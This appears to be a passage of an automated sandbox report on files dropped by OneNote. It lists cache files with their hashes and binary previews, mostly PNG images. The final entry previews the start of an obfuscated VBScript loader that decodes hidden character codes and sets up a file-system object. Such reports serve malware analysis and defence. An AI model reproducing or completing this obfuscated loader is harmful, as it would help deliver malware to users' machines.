                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004K.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004L.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004M.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004N.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004O.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004P.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004Q.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004R.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004S.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004T.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004U.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000051.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:HTML document, ASCII text, with very long lines (744), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):63088
                                                                                                  Entropy (8bit):5.191423193815745
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6hKs7p4MAPEQbhh/8avllsFEaN3K19Z5zkzCIi5:6L7p4MafVLYEaN3K19ZWzCn5
                                                                                                  MD5:45282862AEB428FFB5D4986704A8F4D5
                                                                                                  SHA1:FA2B0A82F3CA6BC7C00704556C9494B303613972
                                                                                                  SHA-256:AF0C7D355BB6A495D038FD05217209054107D31AA6199C491B74AE3D24B11C7E
                                                                                                  SHA-512:DB6457AF502F45665CE4CC6573C5746607D8FFC661F0DCB224BECEED93886F6C6194561CACC0EFA543F0B2F62DB976742F42C6C8102C5B11B65329757110B1DB
                                                                                                  Malicious:false
                                                                                                  Preview:<job id="clockwork">..<script language="VBScript">..talkedy = talkedy + ("\ocw11934\ocw11628\ocw11016\ocw10098\ocw11322\ocw11934\ocw11220\ocw11832\ocw6222\ocw4998\ocw1326")..downstairsy = "downstairsy"..wittyy = wittyy + ("bjszvm\ocwfalsefreshybarbarouslyydistrustedyfreshy")..aptenty = "aptenty"..unfortunatebuty = mid(wittyy,7,4)..'partingypartingy..solelyy = Split(talkedy,unfortunatebuty,-1,0)..barbeledy = "barbeledy"..for volutpaty = 1 to Ubound(solelyy)...consultedy = consultedy & chr(Clng(solelyy(volutpaty)) / 102)..Next..'barbeledybarbeledy..talkedy = talkedy + ("\ocw11730\ocw10302\ocw11832\ocw3264\ocw10404\ocw11730\ocw11322\ocw9996\ocw10812\ocw10302\ocw10098\ocw11832\ocw6222\ocw10098\ocw11628\ocw10302\ocw9894\ocw11832\ocw10302\ocw11322\ocw9996\ocw10812\ocw10302\ocw10098\ocw11832\ocw4080\ocw3468\ocw11730\ocw10098\ocw11628\ocw10710\ocw11424\ocw11832\ocw10710\ocw11220\ocw10506\ocw4692\ocw10404\ocw10710\ocw11016\ocw10302\ocw11730\ocw12342\ocw11730\ocw11832\ocw10302\ocw11118\ocw11322\

